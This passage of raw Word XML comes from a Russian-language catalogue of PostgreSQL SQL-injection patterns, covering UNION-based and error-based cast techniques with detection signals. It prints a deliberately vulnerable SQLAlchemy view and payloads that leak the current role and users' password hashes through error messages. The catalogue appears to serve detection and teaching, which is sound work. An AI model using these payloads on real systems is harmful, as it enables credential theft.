        <w:t>ssl_cert_file</w:t>
      </w:r>
      <w:r>
        <w:t>). Application не запрашивает пути на ФС — это маркер reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC8BFF9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Массовое чтение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с фильтрами по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attrelid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для разных таблиц подряд в коротком окне — снятие схемы. Легитимный ORM делает это один раз при инициализации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73797338" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Любое появление </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</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pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от точки, где других UNION в нормальном коде нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15461B4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG. Базовый набор полей стабилен с PG 9.x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D91A7BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1.1, 3.1.2, 3.1.3 (точки входа), 3.8 (метаданные как самостоятельная категория).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD1744" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL Documentation: System Catalogs; The Information Schema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D24D1E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E54153" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Паттерны:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B080DA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.1 Определение числа колонок — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F00AD4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.2 Подгонка типов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4804BFD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3.1.3 UNION внутри IN-списка</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794020F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.4 Извлечение метаданных через UNION + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3CEA90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники из research: нет — категория покрывается официальной документацией PostgreSQL и стандартными SQLi-cheat-sheet (PortSwigger). UNION-based — универсальная техника.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF5986" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Error-based через cast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1A40E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2.0 Обзор категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C387B84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Error-based extraction работает, когда сообщение об ошибке БД доходит до атакующего напрямую или транзитом через HTTP-ответ приложения. PostgreSQL генерирует подробные ошибки, в которые попадают пользовательские значения: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid input syntax for type integer: "&lt;value&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation "&lt;name&gt;" does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>division by zero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid input value for type xml</w:t>
      </w:r>
      <w:r>
        <w:t>. Атакующий заставляет cast или операцию провалиться на значении, вычисленном из подзапроса, и читает данные через текст ошибки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE74720" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>В категории четыре типа примитивов и один обязательный контекст:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA07E1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Числовые касты (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::numeric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::float8</w:t>
      </w:r>
      <w:r>
        <w:t>) — самый универсальный канал, 3.2.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04127F5E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regclass</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — leak через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:t>, удобен для коротких строк, 3.2.2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ACFD68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Условная ошибка через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN ... THEN 1/0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — превращает boolean в error/no-error канал, мост в 3.3, 3.2.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B826AD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">XML-парсер через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — менее надёжный, но рабочий в специфичных кейсах, 3.2.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25491E02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Каналы доставки ошибки до атакующего (Django/SQLAlchemy/Spring) — без них вся категория не работает, 3.2.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01110826" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Канал работает только при наличии всех трёх условий одновременно: уязвимая точка инъекции + один из примитивов + один из путей пробрасывания ошибки. Снятие любого из трёх убирает категорию полностью.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05724FFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2.1 Числовые касты со вложенным SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D73102D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая колонка целочисленного типа в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вокруг выражения превращает PG-парсер в leak-канал: при попытке привести нечисловую строку к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>integer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid input syntax for type integer: "&lt;value&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;value&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это то, что вернул подзапрос.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124051F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48955378" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AFED5B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31820B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy.exc import DBAPIError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956AC80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D246F6F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@app.get("/products/{product_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3D35B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_product(product_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6048AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED160BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5178A2D9"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1C0C5286"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1FC6A38B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227CBC34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    except DBAPIError as exc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264CCCEA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Антипаттерн: текст исключения в ответе клиенту</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E056C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return {"error": str(exc)}, 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1102E6F7"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37634668" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Базовое извлечение текущей роли:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7690D1DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CAST(current_user AS int))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCFA2BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A300F5"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CAST(current_user AS int))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6877BD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>В HTTP-ответе:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC68B76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: invalid input syntax for type integer: "app_user"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E12D2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Извлечение содержимого таблицы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568EBBD6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CAST((SELECT login || '|' || password_hash FROM users LIMIT 1) AS int))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC8EC31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0319D96A"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CAST((SELECT login || '|' || password_hash FROM users LIMIT 1) AS int))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B6612C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>В ответе:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBA882A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
